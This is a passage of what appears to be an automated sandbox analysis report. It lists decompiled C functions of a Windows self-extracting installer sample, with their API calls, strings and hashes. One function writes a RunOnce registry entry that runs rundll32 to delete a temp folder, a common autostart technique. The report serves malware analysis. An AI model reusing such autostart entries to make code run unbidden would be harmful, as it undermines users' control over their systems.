                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: b77375022d05ae8a64b483990d51b743c4707dc4f2e822ba92ba8649a2b9ed47
                                                                                                                                                                                                                                                • Instruction ID: 5d6e9a4519aa2181396bf68f5293d454d05f618da495589decc256e7cbcbc0bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b77375022d05ae8a64b483990d51b743c4707dc4f2e822ba92ba8649a2b9ed47
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6831B034240321BBF7701F25BC4DE2A3AADE786B11F30C529FA06952A1CE7D8A12CB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E00024224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E000244B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x288c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x287a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x28598;
					_v36 = 1;
					_v32 = E00024200;
					_v28 = 0x288c0;
					 *0x2a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x2a288(_t32, 0x288c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x288c0 != 0) {
							E00021680(0x287a0, 0x104, 0x288c0);
						}
						 *0x2a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x287a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x288c0);
					_t61 = 0x288c0;
					_t4 =  &(_t61[1]); // 0x288c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x288c0; // 0x51181
					_t44 = CharPrevA(0x288c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x288c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                                0x00024234
                                                                                                                                                                                                                                                0x0002423c
                                                                                                                                                                                                                                                0x00024240
                                                                                                                                                                                                                                                0x000243b2
                                                                                                                                                                                                                                                0x000243b7
                                                                                                                                                                                                                                                0x000243c0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000243c5
                                                                                                                                                                                                                                                0x0002424c
                                                                                                                                                                                                                                                0x00024252
                                                                                                                                                                                                                                                0x00024257
                                                                                                                                                                                                                                                0x000243a4
                                                                                                                                                                                                                                                0x000243a5
                                                                                                                                                                                                                                                0x000243ab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000243ab
                                                                                                                                                                                                                                                0x00024263
                                                                                                                                                                                                                                                0x00024269
                                                                                                                                                                                                                                                0x0002426e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002427a
                                                                                                                                                                                                                                                0x00024280
                                                                                                                                                                                                                                                0x00024285
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002428d
                                                                                                                                                                                                                                                0x00024293
                                                                                                                                                                                                                                                0x000242e6
                                                                                                                                                                                                                                                0x000242e9
                                                                                                                                                                                                                                                0x000242ef
                                                                                                                                                                                                                                                0x000242f4
                                                                                                                                                                                                                                                0x000242f7
                                                                                                                                                                                                                                                0x00024300
                                                                                                                                                                                                                                                0x00024307
                                                                                                                                                                                                                                                0x0002430e
                                                                                                                                                                                                                                                0x00024315
                                                                                                                                                                                                                                                0x0002431c
                                                                                                                                                                                                                                                0x00024322
                                                                                                                                                                                                                                                0x00024326
                                                                                                                                                                                                                                                0x0002432d
                                                                                                                                                                                                                                                0x0002432d
                                                                                                                                                                                                                                                0x0002432f
                                                                                                                                                                                                                                                0x00024334
                                                                                                                                                                                                                                                0x00024343
                                                                                                                                                                                                                                                0x00024349
                                                                                                                                                                                                                                                0x0002434d
                                                                                                                                                                                                                                                0x00024354
                                                                                                                                                                                                                                                0x00024354
                                                                                                                                                                                                                                                0x0002435d
                                                                                                                                                                                                                                                0x0002436e
                                                                                                                                                                                                                                                0x0002436e
                                                                                                                                                                                                                                                0x0002437d
                                                                                                                                                                                                                                                0x00024383
                                                                                                                                                                                                                                                0x00024387
                                                                                                                                                                                                                                                0x0002438e
                                                                                                                                                                                                                                                0x0002438e
                                                                                                                                                                                                                                                0x00024387
                                                                                                                                                                                                                                                0x00024391
                                                                                                                                                                                                                                                0x00024399
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024295
                                                                                                                                                                                                                                                0x0002429f
                                                                                                                                                                                                                                                0x000242a5
                                                                                                                                                                                                                                                0x000242aa
                                                                                                                                                                                                                                                0x000242aa
                                                                                                                                                                                                                                                0x000242ad
                                                                                                                                                                                                                                                0x000242ad
                                                                                                                                                                                                                                                0x000242af
                                                                                                                                                                                                                                                0x000242b0
                                                                                                                                                                                                                                                0x000242b6
                                                                                                                                                                                                                                                0x000242c2
                                                                                                                                                                                                                                                0x000242c8
                                                                                                                                                                                                                                                0x000242ce
                                                                                                                                                                                                                                                0x000242e4
                                                                                                                                                                                                                                                0x000242e4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000242ce

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00024236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0002424C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00024263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0002427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,000288C0,?,00000001), ref: 0002429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(000288C0,00051181,?,00000001), ref: 000242C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(000288C0,00000000,?,00000001), ref: 000242D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00024391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000243A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: 0be00e9ed6e569e85582a356c65b812f80f9c814ecc9c873c340b64f7d9673c4
                                                                                                                                                                                                                                                • Instruction ID: 788940f709c6ca495beaae8f22421359f5b0419ca1653da4e181759b251d0715
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0be00e9ed6e569e85582a356c65b812f80f9c814ecc9c873c340b64f7d9673c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB413978B01220EFE721AF74FC84AAE7BB4EB49344F64416AE941A7251CF788D06C771
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00022773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00022773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x28004; // 0xf4950d3e
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00021781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0002658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0002658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x21140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00021680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00026CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                                0x00022773
                                                                                                                                                                                                                                                0x0002277e
                                                                                                                                                                                                                                                0x00022785
                                                                                                                                                                                                                                                0x0002278a
                                                                                                                                                                                                                                                0x0002278d
                                                                                                                                                                                                                                                0x00022790
                                                                                                                                                                                                                                                0x00022792
                                                                                                                                                                                                                                                0x00022798
                                                                                                                                                                                                                                                0x0002279d
                                                                                                                                                                                                                                                0x000228b2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000227a3
                                                                                                                                                                                                                                                0x000227a3
                                                                                                                                                                                                                                                0x000227af
                                                                                                                                                                                                                                                0x000227c2
                                                                                                                                                                                                                                                0x000227c8
                                                                                                                                                                                                                                                0x000227cd
                                                                                                                                                                                                                                                0x000227d5
                                                                                                                                                                                                                                                0x000228b7
                                                                                                                                                                                                                                                0x000228b9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000227db
                                                                                                                                                                                                                                                0x000227dd
                                                                                                                                                                                                                                                0x000228aa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000227e3
                                                                                                                                                                                                                                                0x000227e3
                                                                                                                                                                                                                                                0x000227ec
                                                                                                                                                                                                                                                0x000227f8
                                                                                                                                                                                                                                                0x00022803
                                                                                                                                                                                                                                                0x0002280b
                                                                                                                                                                                                                                                0x00022831
                                                                                                                                                                                                                                                0x000228c3
                                                                                                                                                                                                                                                0x000228c9
                                                                                                                                                                                                                                                0x000228cd
                                                                                                                                                                                                                                                0x00022837
                                                                                                                                                                                                                                                0x0002285a
                                                                                                                                                                                                                                                0x0002285c
                                                                                                                                                                                                                                                0x00022865
                                                                                                                                                                                                                                                0x00022892
                                                                                                                                                                                                                                                0x00022895
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022867
                                                                                                                                                                                                                                                0x00022878
                                                                                                                                                                                                                                                0x0002288c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002287a
                                                                                                                                                                                                                                                0x00022880
                                                                                                                                                                                                                                                0x00022885
                                                                                                                                                                                                                                                0x00022897
                                                                                                                                                                                                                                                0x00022899
                                                                                                                                                                                                                                                0x00022899
                                                                                                                                                                                                                                                0x00022878
                                                                                                                                                                                                                                                0x00022865
                                                                                                                                                                                                                                                0x000228a0
                                                                                                                                                                                                                                                0x000228bf
                                                                                                                                                                                                                                                0x000228c1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000228c1
                                                                                                                                                                                                                                                0x00022831
                                                                                                                                                                                                                                                0x000227dd
                                                                                                                                                                                                                                                0x000227d5
                                                                                                                                                                                                                                                0x000228e5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(F4950D3E,00000000,00000000,00000000), ref: 000227A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 000227B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 000227BC
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00022870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000228A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000228AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 000228B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000227E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: 23377a75e18de90fd6a2f0f18e868625463d7f7dda2826985472ff6d1cb477a5
                                                                                                                                                                                                                                                • Instruction ID: 6805a57efd774fe4f31fdde95f499c060f5fe498b3d8ac115f65f37ad612052e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23377a75e18de90fd6a2f0f18e868625463d7f7dda2826985472ff6d1cb477a5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41A371A0113CAFEB249B64AC85AFE77BDEB55700F1040A9F549D2101DF748EC68FA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00022267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E00022267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x28004; // 0xf4950d3e
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x28530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0002658A( &_v268, 0x104, 0x21140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E0002171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00026CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                                0x00022272
                                                                                                                                                                                                                                                0x00022277
                                                                                                                                                                                                                                                0x00022279
                                                                                                                                                                                                                                                0x00022283
                                                                                                                                                                                                                                                0x00022289
                                                                                                                                                                                                                                                0x000222ab
                                                                                                                                                                                                                                                0x000222b1
                                                                                                                                                                                                                                                0x000222c4
                                                                                                                                                                                                                                                0x000222e0
                                                                                                                                                                                                                                                0x000222e6
                                                                                                                                                                                                                                                0x000222f5
                                                                                                                                                                                                                                                0x0002230d
                                                                                                                                                                                                                                                0x0002231c
                                                                                                                                                                                                                                                0x0002231c
                                                                                                                                                                                                                                                0x00022321
                                                                                                                                                                                                                                                0x0002233a
                                                                                                                                                                                                                                                0x00022342
                                                                                                                                                                                                                                                0x00022348
                                                                                                                                                                                                                                                0x0002234b
                                                                                                                                                                                                                                                0x0002234c
                                                                                                                                                                                                                                                0x0002234c
                                                                                                                                                                                                                                                0x0002234e
                                                                                                                                                                                                                                                0x0002234f
                                                                                                                                                                                                                                                0x0002236e
                                                                                                                                                                                                                                                0x0002236e
                                                                                                                                                                                                                                                0x0002237a
                                                                                                                                                                                                                                                0x00022380
                                                                                                                                                                                                                                                0x00022380
                                                                                                                                                                                                                                                0x00022381
                                                                                                                                                                                                                                                0x00022381
                                                                                                                                                                                                                                                0x0002238f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000222A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 000222D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 000222F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00022305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0002236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0002237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00022321
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0002232D
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00022299
                                                                                                                                                                                                                                                • wextract_cleanup1, xrefs: 0002227C, 000222CD, 00022363
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                                • API String ID: 3027380567-2048191181
                                                                                                                                                                                                                                                • Opcode ID: 430295608c805dc8da5d10ab0734e02d05e7756483c0471ff72c740435caa064
                                                                                                                                                                                                                                                • Instruction ID: a2aaa3018aa8a6738f874fc52ccb5028d307083fbd66f3bc64f8f2eed741a8aa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 430295608c805dc8da5d10ab0734e02d05e7756483c0471ff72c740435caa064
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8231D671A00238ABDB71DB50EC89FEAB77CEF15740F0001E5B90DAA051DA756F89CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00023100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E00023100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x28590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x28590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E000243D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x28d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x288b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E000230C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                                0x00023108
                                                                                                                                                                                                                                                0x0002310b
                                                                                                                                                                                                                                                0x000231b7
                                                                                                                                                                                                                                                0x000231ca
                                                                                                                                                                                                                                                0x000231d0
                                                                                                                                                                                                                                                0x000231d0
                                                                                                                                                                                                                                                0x000231da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000231da
                                                                                                                                                                                                                                                0x00023111
                                                                                                                                                                                                                                                0x00023114
                                                                                                                                                                                                                                                0x00023136
                                                                                                                                                                                                                                                0x00023136
                                                                                                                                                                                                                                                0x00023138
                                                                                                                                                                                                                                                0x0002313b
                                                                                                                                                                                                                                                0x00023141
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023143
                                                                                                                                                                                                                                                0x00023116
                                                                                                                                                                                                                                                0x0002311b
                                                                                                                                                                                                                                                0x0002314b
                                                                                                                                                                                                                                                0x00023151
                                                                                                                                                                                                                                                0x00023158
                                                                                                                                                                                                                                                0x0002316a
                                                                                                                                                                                                                                                0x00023176
                                                                                                                                                                                                                                                0x0002317d
                                                                                                                                                                                                                                                0x0002318b
                                                                                                                                                                                                                                                0x0002319e
                                                                                                                                                                                                                                                0x000231a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000231ad
                                                                                                                                                                                                                                                0x00023120
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002312a
                                                                                                                                                                                                                                                0x00023134
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023134
                                                                                                                                                                                                                                                0x0002312c
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0002313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0002314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0002316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00023176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0002317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 00023185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00023190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,000230C0), ref: 000231A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000231CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
